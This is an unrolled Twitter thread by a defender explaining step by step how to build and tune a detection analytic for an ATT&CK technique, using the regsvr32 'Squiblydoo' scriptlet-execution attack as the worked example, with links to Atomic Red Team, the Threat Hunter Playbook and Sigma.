Profile picture
, 19 tweets, 5 min read Read on Twitter
(thread) One of the things we talked about on the @redcanaryco @CarbonBlack_Inc @MITREattack webinar today was how to start with one attack and use that to build a stronger defensive program.
But people also ask, how do I even start with one analytic? Well, here's one approach. I don't want to repeat the webinar, so let's use an ATT&CK technique as an example: attack.mitre.org/techniques/T11…
How do you build an analytic for that? Where do you even start?
Well, first, you need to understand the attack and how it's used by adversaries. Use the ATT&CK page to do that. Dig in to some of the reports and search for the relevant part and what immediately surrounds it.
Then, abstract that out to a set of general patterns for how the attack can work. Atomic Red Team from @redcanaryco can be a good start. github.com/redcanaryco/at…
In this case, you can see the general pattern of the Squiblydoo attack (h/t @subtee), non-HTTP based scriptlet execution, and executing malicious DLLs directly.
You'll definitely want to execute those attacks yourself! Use your lab environment, download some VMs and try it at home, do something. This doesn't mean being a red-teamer but it does mean understanding what a red-teamer does at that step.
Don't have a lab yet? Try github.com/clong/Detectio… or even just a Windows VM with Splunk free, ELK, or some other SIEM and Sysmon (though note standalone test VMs won't get you certain things in particular for lateral movement and credential access)
After carrying out the attack, see what it looks like in the logs. Figure out what event IDs you need, whether Sysmon is necessary, or whether your EDR can see the behavior. Threat Hunter Playbook is a great resource: github.com/Cyb3rWard0g/Th…
Then just write a search that you know will catch the attack. In software dev, this is called red/green/refactor. You have a failing test (attack that gets through) -- turn it green by writing a detection.
In this case, you probably want to look at process creations for regsvr32.exe and examine the command line. How do I know? Because that's what shows up in the logs when you execute the attack (also, the threat hunter playbook told me).
Next, refactor. Try the attack in a slightly different way until it "fails". Tune the query or add more queries to make sure you can still catch it. Here, the ATT&CK page and atomic red team should give you some ideas. As can your red team friends.
Then introduce some noise. You'll need to try this on the production network that you want it to run on, or you'll be shocked by just how many false positives you can generate! Run those searches and filter out events until you get an acceptable level of true positives.
In this case, Squiblydoo is likely pretty distinctive but the more generic execution might be tough to identify without doing some baselining/stacking (meaning, manually look for anomalies that seem weird in your env)
Look at filtering by different aspects of the data. When it's bad, does it always have certain command-line arguments? Is it followed by other distinct events (e.g., network traffic)? ThreatHunter-Playbook may give you some ideas here.
In this case, do you see any legitimate usage of regsvr32 accessing the internet?
Then just keep going and going until you have a set of searches that detect the bad and very little good.
And don't forget, it might be done already! Check out car.mitre.org, github.com/Neo23x0/sigma, eqllib.readthedocs.io/en/latest/anal…. They might also be inspiration for you to pivot off of.
Well that thread kind of got away from me but there you go. Eventually I'll blog on this with more links and screenshots.
Missing some Tweet in this thread?
You can try to force a refresh.

Like this thread? Get email updates or save it to PDF!

Subscribe to John Wunder
Profile picture

Get real-time email alerts when new unrolls are available from this author!

This content may be removed anytime!

Twitter may remove this content at anytime, convert it as a PDF, save and print for later use!

Try unrolling a thread yourself!

how to unroll video

1) Follow Thread Reader App on Twitter so you can easily mention us!

2) Go to a Twitter thread (series of Tweets by the same owner) and mention us with a keyword "unroll" @threadreaderapp unroll

You can practice here first or read more on our help page!

Follow Us on Twitter!

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just three indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3.00/month or $30.00/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal Become our Patreon

Thank you for your support!